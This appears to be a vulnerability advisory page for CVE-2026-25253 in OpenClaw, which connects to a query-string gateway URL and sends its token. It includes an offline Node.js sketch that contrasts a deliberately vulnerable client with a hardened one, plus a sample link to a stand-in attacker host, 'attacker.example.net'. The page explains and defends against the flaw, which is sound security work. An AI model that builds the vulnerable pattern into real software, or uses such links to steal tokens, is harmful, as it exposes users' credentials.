CVE-2026-25253
Published: 01 February 2026
Summary
CVE-2026-25253 is a high-severity Incorrect Resource Transfer Between Spheres (CWE-669) vulnerability in OpenClaw (also known as clawdbot or Moltbot), affecting versions before 2026.1.29. Its CVSS v3.1 base score is 8.8 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Client Execution (T1203). It is ranked at the 26.0th percentile by exploit likelihood (below the median), it is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-4 (Information Flow Enforcement) and SI-10 (Information Input Validation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- Patching to the fixed version: directly mitigates CVE-2026-25253 by requiring timely update to OpenClaw 2026.1.29 or later, which removes the automatic, unprompted WebSocket connection to a gateway supplied in the query string.
- SI-10 (Information Input Validation): requires validation of untrusted query-string inputs such as gatewayUrl, so that the client does not connect to an attacker-controlled WebSocket endpoint without prompting the user.
- AC-4 (Information Flow Enforcement): enforces a flow-control policy so that the token is not transmitted over a WebSocket connection opened to an endpoint taken from a malicious query parameter.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The vulnerability enables one-click client-side exploitation: a user who follows a malicious link (T1204.001, User Execution: Malicious Link) triggers an automatic WebSocket connection to an attacker endpoint, which transmits the application's access token to the attacker (T1528, Steal Application Access Token) and which the referenced demonstrations extend to remote code execution (T1203, Exploitation for Client Execution).
NVD Description
OpenClaw (aka clawdbot or Moltbot) before 2026.1.29 obtains a gatewayUrl value from a query string and automatically makes a WebSocket connection without prompting, sending a token value.
Deeper analysis
CVE-2026-25253 is a vulnerability in OpenClaw (also known as clawdbot or Moltbot) versions prior to 2026.1.29. The issue stems from the software obtaining a gatewayUrl value from a query string and automatically establishing a WebSocket connection without user prompting, which results in sending a token value over that connection. This flaw is rated with a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) and is associated with CWE-669.
Exploitation is remote and requires no privileges, but it does require user interaction (UI:R in the vector): the attacker tricks a user into opening a link whose query string carries an attacker-controlled gatewayUrl. The client then connects to the attacker's WebSocket endpoint and transmits the token to it, handing the attacker a credential for the application; the referenced write-ups chain this into remote code execution, which is why the vector carries high confidentiality, integrity and availability impact.
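As an added worked example, not OpenClaw's code and not a description of its actual implementation, the following Node.js sketch models the pattern the NVD description and the controls above describe: a web client reads gatewayUrl from the page's query string and opens a WebSocket to it. The vulnerable function connects and sends the token unconditionally; the hardened function validates the untrusted input (SI-10), restricts the token's flow to an allowlist of gateway origins (AC-4) and requires an explicit confirmation before connecting. The recording WebSocket class, the allowlist entry wss://gateway.example.com, the attacker.example.net link and the auth message format are all assumptions made for this example.

```javascript
// Added illustrative example (not OpenClaw's code): a web client that reads
// a gateway URL from the page's query string and opens a WebSocket to it.
// The WebSocket class is a stand-in that records what a real one would do,
// so the example runs offline in Node.js.

class RecordingWebSocket {
  constructor(url) {
    this.url = url;   // endpoint the client chose to connect to
    this.sent = [];   // frames the client pushed over the socket
  }
  send(frame) {
    this.sent.push(frame);
  }
}

// Vulnerable pattern (the class of flaw described by the CVE): trust the
// gatewayUrl query parameter, connect immediately without asking the user,
// and send the token over whatever socket results.
function connectVulnerable(locationSearch, token, WS = RecordingWebSocket) {
  const gatewayUrl = new URLSearchParams(locationSearch).get("gatewayUrl");
  if (!gatewayUrl) return null;
  const ws = new WS(gatewayUrl);                      // attacker picks the host
  ws.send(JSON.stringify({ type: "auth", token }));   // token leaves the origin
  return ws;
}

// Hardened pattern: validate the untrusted input (SI-10), only let the token
// flow to allowlisted gateways (AC-4), and require an explicit user decision
// before connecting. The allowlist below is an assumption for this example.
const ALLOWED_GATEWAY_ORIGINS = new Set(["wss://gateway.example.com"]);

function validateGatewayUrl(candidate, allowedOrigins = ALLOWED_GATEWAY_ORIGINS) {
  let url;
  try {
    url = new URL(candidate);
  } catch {
    return { ok: false, reason: "gatewayUrl is not a valid URL" };
  }
  if (url.protocol !== "wss:") {
    return { ok: false, reason: `scheme ${url.protocol} rejected; only wss: allowed` };
  }
  if (url.username || url.password) {
    return { ok: false, reason: "embedded credentials rejected" };
  }
  // origin = scheme + host + port, so a lookalike host or odd port fails here
  if (!allowedOrigins.has(url.origin)) {
    return { ok: false, reason: `origin ${url.origin} is not an allowed gateway` };
  }
  return { ok: true, url: url.href };
}

function connectHardened(locationSearch, token, options = {}) {
  const { confirm, WS = RecordingWebSocket, allowedOrigins } = options;
  const gatewayUrl = new URLSearchParams(locationSearch).get("gatewayUrl");
  if (!gatewayUrl) return { connected: false, reason: "no gatewayUrl supplied" };

  const verdict = validateGatewayUrl(gatewayUrl, allowedOrigins);
  if (!verdict.ok) return { connected: false, reason: verdict.reason };

  // Even an allowlisted URL arriving via a link is unsolicited: ask first.
  if (typeof confirm !== "function" || !confirm(`Connect to gateway ${verdict.url}?`)) {
    return { connected: false, reason: "user did not confirm the connection" };
  }
  const ws = new WS(verdict.url);
  ws.send(JSON.stringify({ type: "auth", token }));
  return { connected: true, ws };
}

// Constructed sample input: the query string of a link an attacker might send.
const ATTACKER_LINK_SEARCH = "?gatewayUrl=wss://attacker.example.net/ws";

// Summarise where the token would go under each pattern for a given link.
function tokenDestination(locationSearch, token) {
  const vuln = connectVulnerable(locationSearch, token);
  const hard = connectHardened(locationSearch, token, { confirm: () => true });
  return {
    vulnerable: vuln ? new URL(vuln.url).host : null,
    hardened: hard.connected ? new URL(hard.ws.url).host : null,
    hardenedReason: hard.connected ? null : hard.reason,
  };
}
```

Running tokenDestination with the constructed attacker link shows the vulnerable path delivering the token to attacker.example.net while the hardened path refuses before any socket is opened. Allowlisting by origin rather than by substring compares scheme, host and port together, and the confirmation step is kept even for allowlisted gateways because a link-triggered connection is unsolicited by definition; neither control alone is the fix, which is why the page lists both SI-10 and AC-4.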
Mitigation guidance from advisories, including the GitHub Security Advisory GHSA-g8p2-7wf7-98mq, recommends updating to OpenClaw version 2026.1.29 or later. Further details on patches and exploitation techniques are provided in references such as depthfirst.com, ethiack.com, openclaw.ai/blog, and an X post by @0xacb.
The referenced blog posts demonstrate exploitation in practice, including one-click remote code execution used to steal Moltbot data and keys.
Details
- CWE(s)